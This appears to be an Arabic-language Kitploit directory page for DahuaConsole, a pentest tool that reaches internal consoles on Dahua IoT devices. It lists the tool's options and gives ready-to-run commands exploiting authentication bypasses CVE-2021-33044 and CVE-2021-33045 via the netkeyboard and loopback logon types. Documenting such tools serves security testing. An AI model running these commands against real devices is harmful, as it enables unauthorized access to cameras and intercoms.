Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DahuaConsole — Dahua Console، الوصول إلى وحدة التحكم الداخلية للتصحيح و/أو وظائف أخرى مكتشفة في أجهزة Dahua. لا تتردد في المساهمة في هذا المشروع. | Kitploit
أدوات/GitHubGitHub/mcw0/dahuaconsole
المصادقة والترخيصأمان الأنظمة المدمجةالاستطلاعأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراق
GitHubmcw0/dahuaconsole

DahuaConsole

Dahua Console، الوصول إلى وحدة التحكم الداخلية للتصحيح و/أو وظائف أخرى مكتشفة في أجهزة Dahua. لا تتردد في المساهمة في هذا المشروع.

3167927منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

Dahua Console

  • الإصدار: Pre-alpha
  • الأخطاء: بالتأكيد
  • TODO: الكثير من الأشياء

[تثبيت المتطلبات]

sudo pip3 install -r requirements.txt

[الوسائط]

  -h, --help            show this help message and exit
  --rhost RHOST         Remote Target Address (IP/FQDN)
  --rport RPORT         Remote Target Port
  --proto {dhip,dvrip,3des,http,https}
                        Protocol [Default: dvrip]
  --relay RELAY         ssh://<username>:<password>@<host>:<port>
  --auth AUTH           Credentials (username:password) [Default: None]
  --ssl                 Use SSL for remote connection
  -d, --debug           JSON traffic
  -dd, --ddebug         hexdump traffic
  --dump {config,service,device,discover,log,test}
                        Dump remote config
  --dump_argv DUMP_ARGV
                        ARGV to --dump
  --test                test w/o login attempt
  --multihost           Connect hosts from "dhConsole.json"
  --save                Save host hash to "dhConsole.json"
  --events              Subscribe to events [Default: False]
  --discover {dhip,dvrip}
                        Discover local devices
  --logon {wsse,loopback,netkeyboard,onvif:plain,onvif:digest,onvif:onvif,plain,ushield,ldap,ad,cms,local,rtsp,basic,old_digest,gui}
                        Logon types
  -f, --force           Bypass stops for dangerous commands
  --calls               Debug internal calls

[الإصدار]

[تحديث] 2022-07-10

  • تمت إضافة طريقة تسجيل الدخول 3des_old لأجهزة VTH1510CH التي تعمل ببرنامج V2 من عام 2016
    • اختلاف بسيط في بيانات حزمة تسجيل الدخول
    • لا تستعلم عن معلمات الجهاز عند الاتصال - سيؤدي ذلك إلى إعادة تعيين الاتصال
  • تمت إضافة --restore config-file.json
    • يقوم بتحميل ملف إعدادات json أو أجزاء منه.

مثال:

./Console.py --rhost 192.168.1.x --proto 3des --auth admin:admin --logon old_3des --dump config

[تحديث]

2021-10-07

التفاصيل هنا: https://github.com/mcw0/PoC/blob/master/Dahua%20authentication%20bypass.txt

2021-10-06

[CVE-2021-33044]

البروتوكول المطلوب: DHIP أو HTTP/HTTPS (لا يعمل DHIP مع TLS/SSL عبر @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto dhip --rport 80

[proto: http/https]
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto http --rport 80
./Console.py --logon netkeyboard --rhost 192.168.57.20 --proto https --rport 443

[CVE-2021-33045]

البروتوكول المطلوب: DHIP (لا يعمل DHIP مع TLS/SSL عبر @TCP/443)

[proto: dhip, normally using tcp/5000]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 5000

[proto: dhip, usually working with HTTP port as well]
./Console.py --logon loopback --rhost 192.168.57.20 --proto dhip --rport 80

تنزيل الأداة